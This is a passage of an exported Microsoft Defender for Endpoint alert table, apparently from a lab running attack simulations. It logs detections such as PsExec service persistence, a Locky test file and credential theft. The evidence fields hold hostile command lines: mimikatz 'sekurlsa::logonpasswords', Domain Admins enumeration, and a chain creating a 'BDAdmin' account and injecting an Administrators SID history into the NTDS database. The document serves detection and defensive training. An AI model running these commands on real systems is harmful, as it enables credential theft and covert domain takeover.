"processCommandLine": "\"net.exe\" group /domain",
"processCreationTime": "2022-12-22T08:47:23.1029019Z",
"processId": 2936,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:36.15Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:26:24.0772409Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 1896,
"processCommandLine": "\"powershell.exe\" -noexit -command Set-Location -literalPath 'C:\\Users\\jeff\\Desktop'",
"processCreationTime": "2022-12-22T08:47:11.8139068Z",
"processId": 6324,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:36.2666667Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"net.exe\" group \"Domain Admins\" /domain",
"processCreationTime": "2022-12-22T08:47:23.149947Z",
"processId": 9268,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:50:36.5266667Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:47:11.8139068Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 6324,
"processCommandLine": "\"net.exe\" group \"Enterprise Admins\" /domain",
"processCreationTime": "2022-12-22T08:47:23.2090769Z",
"processId": 1912,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-18T05:12:05.62Z
|
Suspicious
|
Active
|
guest
|
NT AUTHORITY
|
S-1-5-18
| null | null |
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
|
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
|
PSEXESVC.exe
|
C:\Windows
| 7,708
|
PSEXESVC.exe
|
2022-11-18T05:09:53.2034539Z
| 620
|
2022-11-16T03:32:19.0279725Z
|
services.exe
|
C:\Windows\System32
|
Detected
|
36150b3c1b69b5c2da9df4efd86ac6c166924a48
|
da638045930748018957_-1728305743
|
b2fe5df8-f486-41b4-93bf-ec47d13a1967
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:04:34.8019105Z
|
2022-11-26T01:35:43.17Z
|
2022-11-26T01:35:43.0633333Z
|
2022-11-21T02:01:45.1526175Z
|
2022-11-21T02:05:52.8107598Z
|
Suspicious file registered as a service
|
A file with suspicious attributes or involved in possible breach activity was registered as a service. An attacker might be attempting to register the file as a service for persistence.
|
Persistence
|
Resolved
|
Medium
| 49
|
TerminatedBySystem
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
d15c9f84-aabc-46e5-a92e-7bb3ce5eceda
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1021.002",
"T1074.002",
"T1543.003",
"T1569.002",
"T1570"
] |
[
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "staging.net",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "None",
"tags": [
"MDE-Management",
"semi auto",
"servers"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] |
[
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:34.85Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-21T02:04:34.85Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:04:34.85Z",
"fileName": "ntoskrnl.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": "2022-11-16T03:32:14.9719242Z",
"processId": 4,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f83368154fce0f4e8f9d6fe000ef522fbb3884b7",
"sha256": "7e4a848626c99c715bd2c8686061420b8895e12ab8dfa0cce091f9df25750c13",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045935113744267_1561680225
|
02e6af6b-d1cc-4482-939d-e15e8a5f6e16
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:11:51.3744432Z
|
2022-11-21T02:36:07.13Z
| null |
2022-11-21T02:07:15.8948675Z
|
2022-11-21T02:34:15.7485618Z
|
Suspicious account creation
|
A new user account was created. A new user account can be created to establish a secondary of backup access to the device or services within the organization. An attacker might be attempting to maintain access to the device or organization.
|
Persistence
|
New
|
Medium
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
b0c31f72-1d80-458a-8ceb-5bc7bbcbd30a
| null | null | null |
[
"T1136",
"T1136.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "NotSupported",
"deviceDnsName": "msdxv2-dc.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:27:58.906Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "Defender",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "WindowsServer2019",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-DC",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "5bc68ee9-2aaf-4b12-8045-60af8aecad6e"
}
}
] |
[
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:11:51.46Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:11:51.46Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:07:15.1389846Z",
"parentProcessFileName": "PSEXESVC.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 7232,
"processCommandLine": "\"cmd\" /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:07:15.6313121Z",
"processId": 3020,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9",
"sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:11:51.46Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:07:15.6313121Z",
"parentProcessFileName": "cmd.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 3020,
"processCommandLine": "net.exe user /add BDAdmin Password1! ",
"processCreationTime": "2022-11-21T02:07:15.6863696Z",
"processId": 5996,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:07.05Z",
"fileName": "cmd.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:34:15.0073785Z",
"parentProcessFileName": "PSEXESVC.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 6984,
"processCommandLine": "\"cmd\" /c \"net.exe user /add BDAdmin Password1! && net.exe stop ntds /y && powershell.exe -Command \"Add-ADDBSidHistory -SamAccountName BDAdmin -SidHistory \\\"S-1-5-32-544\\\" -DatabasePath (Get-ItemProperty -Path Registry::HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters).\\\"DSA Database file\\\"\" && net.exe start ntds\"",
"processCreationTime": "2022-11-21T02:34:15.4789089Z",
"processId": 4960,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "ded8fd7f36417f66eb6ada10e0c0d7c0022986e9",
"sha256": "bc866cfcdda37e24dc2634dc282c7a0e6f55209da17a8fa105b07414c0e7c527",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": "Detected",
"deviceId": "e138ecd8e7b21eaf952cb35d56349bf50c64ac96",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-21T02:36:07.05Z",
"fileName": "net.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-21T02:34:15.4789089Z",
"parentProcessFileName": "cmd.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 4960,
"processCommandLine": "net.exe user /add BDAdmin Password1! ",
"processCreationTime": "2022-11-21T02:34:15.5232143Z",
"processId": 6372,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "4f4970c3545972fea2bc1984d597fc810e6321e0",
"sha256": "25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369",
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638060594419234978_-2115207275
|
c9194fe2-c701-4e8e-a370-073c3f95d161
| 794
|
MicrosoftDefenderForEndpoint
|
2022-12-08T01:24:01.9235206Z
|
2022-12-08T01:37:06.9Z
| null |
2022-12-08T01:12:10.9804212Z
|
2022-12-08T01:12:10.9804212Z
|
'Locky' ransomware was prevented
|
Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.
To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
|
Ransomware
|
New
|
Medium
| 56
|
PartiallyRemediated
| null | null |
WindowsDefenderAv
|
51d03c45-b142-4de4-95df-01b0c259d8f6
| null | null |
Locky
|
[] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "NotUpdated",
"deviceDnsName": "internal.corp",
"firstSeen": "2022-12-08T01:04:21.9057174Z",
"healthStatus": "Active",
"loggedOnUsers": [],
"mdatpDeviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "UnassignedGroup",
"riskScore": "Medium",
"tags": [],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV8/providers/Microsoft.Compute/virtualMachines/MSDXV8-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "97e5e58b-3d5e-4bfe-8e40-a88b49deff08"
}
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Prevented",
"deviceId": "4f111b3b2366eacdcc66d7ad73548fff9b039c15",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-08T01:24:02.17Z",
"fileName": "TestFile_Block_Office_applications_from_creating_executable_content_3B576869-A4EC-4529-8536-B80A7769E899.docm",
"filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Office applications from creating executable content",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": "File was created again after being remediated by antivirus",
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-12-22T08:50:49.9533333Z
|
Suspicious
|
None
|
analyst
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1104
| null |
jeff@msdxv8.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 7,772
|
"mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
|
2022-12-22T08:47:23.3350389Z
| 6,324
|
2022-12-22T08:47:11.8139068Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
|
da638043450386903765_478850720
|
9d05bd6b-2c86-438e-9dc6-ecef8c79e520
| 741
|
MicrosoftDefenderForEndpoint
|
2022-11-18T05:10:38.6903991Z
|
2022-11-19T01:35:46.6533333Z
|
2022-11-19T01:35:46.5533333Z
|
2022-11-18T05:04:07.3912445Z
|
2022-11-18T05:09:21.2888191Z
|
Suspicious System Network Configuration Discovery
|
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
|
Discovery
|
Resolved
|
Low
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1016",
"T1049",
"T1059.001"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:10:38.7433333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:10:38.7433333Z",
"fileName": "powershell.exe",
"filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z",
"parentProcessFileName": "explorer.exe",
"parentProcessFilePath": "C:\\Windows",
"parentProcessId": 4680,
"processCommandLine": "\"powershell.exe\" ",
"processCreationTime": "2022-11-18T05:04:12.7150402Z",
"processId": 4976,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c",
"sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:10:38.7433333Z",
"fileName": "explorer.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-10T07:07:25.9825113Z",
"parentProcessFileName": "userinit.exe",
"parentProcessFilePath": null,
"parentProcessId": 4684,
"processCommandLine": "Explorer.EXE",
"processCreationTime": "2022-11-10T07:07:26.0872385Z",
"processId": 4680,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d",
"sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b",
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-09-30T06:14:54.5333333Z
|
Benign
|
Active
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
9a3be34e8316ebb945a4d5818a4066c91fe98c95
|
54daf167f8dbe7fe0f23b37a600bd8d9d16b756d3b83f0804b5037cbbe895eb6
|
nslookup.exe
|
C:\Windows\System32
| 7,544
|
nslookup msdxv2-dc.msdxv2.m365dpoc.com
|
2022-09-30T06:11:51.7207947Z
| 10,824
|
2022-09-30T06:11:51.7062175Z
|
cmd.exe
|
C:\Windows\System32
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
da638043451804400008_785024808
|
75137dd1-ced1-4dc4-a6a7-cae664ee0e50
| 741
|
MicrosoftDefenderForEndpoint
|
2022-11-18T05:13:00.4400195Z
|
2022-11-19T01:35:46.6533333Z
|
2022-11-19T01:35:46.5533333Z
|
2022-11-18T05:09:58.9938323Z
|
2022-11-18T05:14:14.4503095Z
|
Malicious credential theft tool execution detected
|
A known credential theft tool execution command line was detected.
Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
|
CredentialAccess
|
Resolved
|
High
| 47
|
PartiallyInvestigated
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1003"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "Critical",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:13:00.48Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:13:00.48Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
